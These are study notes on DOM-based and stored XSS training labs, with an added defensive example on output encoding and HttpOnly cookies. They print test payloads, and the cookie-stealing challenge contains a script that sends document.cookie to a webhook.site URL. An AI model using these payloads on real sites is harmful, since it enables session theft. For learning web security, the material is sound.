9. XSS LABS

1. LAB XSS 0x01 - DOM BASED XSS

  • <script>prompt(1)</script>

  • Check the browser's Network tab to see whether a request is sent to the server -> NO request is actually sent!

  • <img src=x onerror="prompt(1)" />

  • With the second payload, a request is sent to the server to load a non-existent image, just to trigger the prompt.

Challenge Solution: <img src="x" onerror="window.location.href='https://example.com';" />

NOTE: YOU CAN EASILY EXPLORE MULTIPLE XSS PAYLOADS IN THIS LAB TO SEE HOW THEY WORK, WITHOUT ANY HASSLE.

2. LAB XSS 0x02 - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

  • Install the Firefox add-on Multi-Account Containers -> creates containers for different accounts (good to know for other CVEs as well :D )

  • Install the Firefox add-on Cookie-Editor

Test first for HTML injection with a simple HTML tag, e.g.: <h1>test</h1>

Exercise

For XSS - Cookie Stealing:

  • Set up a cookie in Container 2

  • Do the XSS from Container 1

  • Try to steal the cookie with <script>prompt(document.cookie)</script>

3. XSS CHALLENGE - STORED CROSS-SITE SCRIPTING (XSS) ATTACKS

Steal the Admin Cookie

<script>var i = new Image; i.src="https://webhook.site/74c992d0-1f96-49fd-afae-349d9b311150/?"+document.cookie;</script>
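
Defender's view of the stored XSS labs above, as an added example that is not part of the original notes or the lab code: it renders a stored comment with and without output encoding, and models which cookies document.cookie can expose once HttpOnly is set. All function names and the sample cookie values are assumptions constructed for illustration.

```javascript
// Added example (not from the lab). Function names and sample
// values are hypothetical and constructed for illustration.

// Encode the five HTML-significant characters so stored input renders as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the stored comment is concatenated into markup as-is.
function renderCommentUnsafe(comment) {
  return '<li class="comment">' + comment + '</li>';
}

// Hardened rendering: same template, comment encoded for the HTML body context.
function renderCommentSafe(comment) {
  return '<li class="comment">' + escapeHtml(comment) + '</li>';
}

// Model of what document.cookie exposes: the name=value pairs of cookies
// whose Set-Cookie header does not carry the HttpOnly attribute.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Constructed sample data: the lab's test payload and two cookie configurations.
const storedComment = '<img src=x onerror="prompt(1)" />';
const weakHeaders = ['session=abc123; Path=/'];
const hardenedHeaders = [
  'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];

console.log(renderCommentUnsafe(storedComment));   // markup reaches the page intact
console.log(renderCommentSafe(storedComment));     // rendered as inert text
console.log(scriptVisibleCookies(weakHeaders));    // session cookie readable by script
console.log(scriptVisibleCookies(hardenedHeaders)); // only the non-HttpOnly cookie
```

HttpOnly only takes the session cookie out of script reach; the injected markup still executes unless the output is encoded, so both controls are needed.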